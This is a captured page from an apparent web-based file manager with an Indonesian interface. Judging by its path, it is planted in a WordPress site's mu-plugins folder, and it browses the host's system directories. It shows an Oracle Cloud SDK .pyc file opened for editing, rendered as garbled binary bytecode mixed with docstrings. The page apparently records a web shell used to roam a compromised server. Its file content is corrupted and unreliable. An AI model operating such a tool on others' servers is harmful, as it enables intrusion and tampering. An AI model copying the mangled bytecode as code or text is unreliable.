📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
libexec
›
oracle-cloud-agent
›
plugins
›
osms
›
oci
›
fusion_apps
›
📁 models
📍
Lokasi:
/usr/libexec/oracle-cloud-agent/plugins/osms/oci/fusion_apps/models
💾
Free:
45.8 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: source_vcn_ip_address_condition.pyc
a N��f: � @ sD d dl mZ ddlmZmZmZ ddlmZ eG dd� de��ZdS )� )� RuleCondition� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ sJ e Zd ZdZdd� Zedd� �Zejdd� �Zdd� Zd d � Z dd� Z d S )�SourceVcnIpAddressConditionz� An access control rule condition that requires a match on the specified source VCN and IP address range. This condition must be used only in conjunction with `SourceVcnIdCondition`. c K s. ddd�| _ ddd�| _d| _d| _d| _dS )aX Initializes a new SourceVcnIpAddressCondition object with values from keyword arguments. The default value of the :py:attr:`~oci.fusion_apps.models.SourceVcnIpAddressCondition.attribute_name` attribute of this class is ``SOURCE_VCN_IP_ADDRESS`` and it should not be changed. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param attribute_name: The value to assign to the attribute_name property of this SourceVcnIpAddressCondition. Allowed values for this property are: "SOURCE_IP_ADDRESS", "SOURCE_VCN_ID", "SOURCE_VCN_IP_ADDRESS" :type attribute_name: str :param attribute_value: The value to assign to the attribute_value property of this SourceVcnIpAddressCondition. :type attribute_value: str �str)�attribute_name�attribute_value� attributeName�attributeValueN�SOURCE_VCN_IP_ADDRESS)� swagger_types� attribute_map�_attribute_name�_attribute_value)�self�kwargs� r ��/sparta/input/_build_configuration/image_build+validate/lib/bmcenv/lib64/python3.9/site-packages/oci/fusion_apps/models/source_vcn_ip_address_condition.py�__init__ s ��z$SourceVcnIpAddressCondition.__init__c C s | j S )a **[Required]** Gets the attribute_value of this SourceVcnIpAddressCondition. An IPv4 address range that the original client IP address (in the context of the specified VCN) of an incoming packet must match. The service accepts only classless inter-domain routing (CIDR) format (x.x.x.x/y) strings. Specify 0.0.0.0/0 to match all incoming traffic in the customer VCN. :return: The attribute_value of this SourceVcnIpAddressCondition. :rtype: str �r �r r r r r / s z+SourceVcnIpAddressCondition.attribute_valuec C s || _ dS )a� Sets the attribute_value of this SourceVcnIpAddressCondition. An IPv4 address range that the original client IP address (in the context of the specified VCN) of an incoming packet must match. The service accepts only classless inter-domain routing (CIDR) format (x.x.x.x/y) strings. Specify 0.0.0.0/0 to match all incoming traffic in the customer VCN. :param attribute_value: The attribute_value of this SourceVcnIpAddressCondition. :type: str Nr )r r r r r r >